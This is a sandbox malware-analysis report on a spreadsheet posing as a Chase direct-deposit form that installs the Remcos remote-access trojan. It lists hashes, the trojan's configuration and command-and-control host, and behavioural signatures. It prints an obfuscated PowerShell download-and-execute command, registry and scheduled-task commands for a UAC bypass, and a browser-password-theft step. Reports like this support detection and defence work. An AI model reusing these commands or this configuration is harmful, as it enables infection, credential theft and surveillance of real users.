Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
25-08-2021 20:11
Static task
static1
Behavioral task
behavioral1
Sample
Chase Direct Deposit.xls
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Chase Direct Deposit.xls
Resource
win10v20210410
General
-
Target
Chase Direct Deposit.xls
-
Size
116KB
-
MD5
89da2874a518638c7f5ec30a286f4167
-
SHA1
c766aba3be2f450a8059b4754fed706730321f4d
-
SHA256
4816d1e51c489e591d7d3d9aeba4cb7a494a97f27bba7a90d45bbe0e1b85a829
-
SHA512
390e3e89026436fff0fa646cc111df980cc5f5ef29b4c3ee1f857de426e643d10bf77f469424ab17a500dd8b575d62af5dea34d42c36a6ab905674c04797c21d
Malware Config
Extracted
remcos
3.2.0 Pro
Augusta
twistednerd.dvrlists.com:8618
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
Augusta-LF4SC3
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
notepad;solitaire;
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3756 2752 powershell.exe EXCEL.EXE -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/4828-334-0x0000000000476274-mapping.dmp WebBrowserPassView -
Nirsoft 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4828-334-0x0000000000476274-mapping.dmp Nirsoft -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 15 3756 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
bill.exebill.exepid process 2904 bill.exe 2424 bill.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
bill.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zgwpegs = "C:\\Users\\Public\\Libraries\\sgepwgZ.url" bill.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
ieinstal.exedescription pid process target process PID 4584 set thread context of 4828 4584 ieinstal.exe ieinstal.exe PID 4584 set thread context of 4844 4584 ieinstal.exe ieinstal.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Modifies registry key 1 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2752 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exeieinstal.exeieinstal.exepid process 3756 powershell.exe 3756 powershell.exe 3756 powershell.exe 4828 ieinstal.exe 4828 ieinstal.exe 4844 ieinstal.exe 4844 ieinstal.exe 4828 ieinstal.exe 4828 ieinstal.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeieinstal.exedescription pid process Token: SeDebugPrivilege 3756 powershell.exe Token: SeDebugPrivilege 4844 ieinstal.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
EXCEL.EXEpowershell.exebill.exedescription pid process target process PID 2752 wrote to memory of 3756 2752 EXCEL.EXE powershell.exe PID 2752 wrote to memory of 3756 2752 EXCEL.EXE powershell.exe PID 3756 wrote to memory of 2904 3756 powershell.exe bill.exe PID 3756 wrote to memory of 2904 3756 powershell.exe bill.exe PID 3756 wrote to memory of 2904 3756 powershell.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe PID 2904 wrote to memory of 2424 2904 bill.exe bill.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Chase Direct Deposit.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00111000,00101110,00110010,00110011,00101110,00110010,00110101,00110001,00101110,00110001,00110001,00110000,00101111,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00111011,01001001,01000101,01011000,00101000,00100100,01010100,01000011,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bill.exe"C:\Users\Admin\AppData\Local\Temp\bill.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bill.exeC:\Users\Admin\AppData\Local\Temp\bill.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tlhpggvgxfqugbwyyhiqfip"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wnmihyoztnizjhkchsdjqukaxd"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ghzshrzbhvamtngozcqltzeryrynop"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Trast.bat" "5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat6⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f7⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "7⤵
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\nest.bat" "5⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f6⤵
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\bill.exeMD5
27ee757d743631d49dcb3c6d7c90dfbe
SHA12b356d2090ea481e38fdf1e78dac05b74c4818f0
SHA256dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028
SHA512871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1
-
C:\Users\Admin\AppData\Local\Temp\bill.exeMD5
27ee757d743631d49dcb3c6d7c90dfbe
SHA12b356d2090ea481e38fdf1e78dac05b74c4818f0
SHA256dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028
SHA512871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1
-
C:\Users\Admin\AppData\Local\Temp\bill.exeMD5
27ee757d743631d49dcb3c6d7c90dfbe
SHA12b356d2090ea481e38fdf1e78dac05b74c4818f0
SHA256dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028
SHA512871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1
-
C:\Users\Admin\AppData\Local\Temp\tlhpggvgxfqugbwyyhiqfipMD5
93d9547e2f6b166ddc13b0f852378d78
SHA19c252ab52886c3e59e832b316bade26fe3473c74
SHA2560e2229e3ecc706a74a1048c7e395644542a880183d9f6809260410d618dbed1d
SHA51281711df6173b9020a004eabd398e4c1f0c092c42ab6888db122dfe2e582c04826025972f06867d207de7f4cb4d15d57afa219aebcbb9c966961696dca93d3298
-
C:\Users\Public\Trast.batMD5
4068c9f69fcd8a171c67f81d4a952a54
SHA14d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA25624222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d
-
C:\Users\Public\UKO.batMD5
eaf8d967454c3bbddbf2e05a421411f8
SHA16170880409b24de75c2dc3d56a506fbff7f6622c
SHA256f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56
SHA512fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9
-
C:\Users\Public\nest.batMD5
8ada51400b7915de2124baaf75e3414c
SHA11a7b9db12184ab7fd7fce1c383f9670a00adb081
SHA25645aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7
SHA5129afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68
-
memory/2424-318-0x00000000001F0000-0x00000000001F1000-memory.dmpFilesize
4KB
-
memory/2424-312-0x0000000000000000-mapping.dmp
-
memory/2424-317-0x00000000001C0000-0x00000000001C1000-memory.dmpFilesize
4KB
-
memory/2424-319-0x0000000000750000-0x000000000089A000-memory.dmpFilesize
1.3MB
-
memory/2752-121-0x00007FF87AD20000-0x00007FF87BE0E000-memory.dmpFilesize
16.9MB
-
memory/2752-114-0x00007FF6FCC00000-0x00007FF7001B6000-memory.dmpFilesize
53.7MB
-
memory/2752-289-0x000001DA12660000-0x000001DA12664000-memory.dmpFilesize
16KB
-
memory/2752-123-0x00007FF878E20000-0x00007FF87AD15000-memory.dmpFilesize
31.0MB
-
memory/2752-122-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2752-118-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2752-117-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2752-116-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2752-115-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2904-306-0x0000000000000000-mapping.dmp
-
memory/2904-310-0x00000000022F0000-0x00000000022F1000-memory.dmpFilesize
4KB
-
memory/2904-314-0x0000000010410000-0x000000001042B000-memory.dmpFilesize
108KB
-
memory/3756-291-0x0000018A71013000-0x0000018A71015000-memory.dmpFilesize
8KB
-
memory/3756-297-0x0000018A71016000-0x0000018A71018000-memory.dmpFilesize
8KB
-
memory/3756-286-0x0000018A70F90000-0x0000018A70F91000-memory.dmpFilesize
4KB
-
memory/3756-276-0x0000000000000000-mapping.dmp
-
memory/3756-292-0x0000018A711A0000-0x0000018A711A1000-memory.dmpFilesize
4KB
-
memory/3756-290-0x0000018A71010000-0x0000018A71012000-memory.dmpFilesize
8KB
-
memory/4584-331-0x0000000010590000-0x000000001060C000-memory.dmpFilesize
496KB
-
memory/4584-320-0x0000000000000000-mapping.dmp
-
memory/4584-329-0x0000000000400000-0x0000000000401000-memory.dmpFilesize
4KB
-
memory/4584-328-0x0000000000140000-0x0000000000141000-memory.dmpFilesize
4KB
-
memory/4584-330-0x00000000001A0000-0x00000000001A1000-memory.dmpFilesize
4KB
-
memory/4584-332-0x0000000000410000-0x0000000000489000-memory.dmpFilesize
484KB
-
memory/4624-321-0x0000000000000000-mapping.dmp
-
memory/4680-323-0x0000000000000000-mapping.dmp
-
memory/4732-325-0x0000000000000000-mapping.dmp
-
memory/4752-326-0x0000000000000000-mapping.dmp
-
memory/4772-327-0x0000000000000000-mapping.dmp
-
memory/4828-334-0x0000000000476274-mapping.dmp
-
memory/4828-333-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/4828-341-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/4844-338-0x0000000000422206-mapping.dmp
-
memory/4844-337-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4844-342-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4924-344-0x0000000000000000-mapping.dmp
-
memory/4976-346-0x0000000000000000-mapping.dmp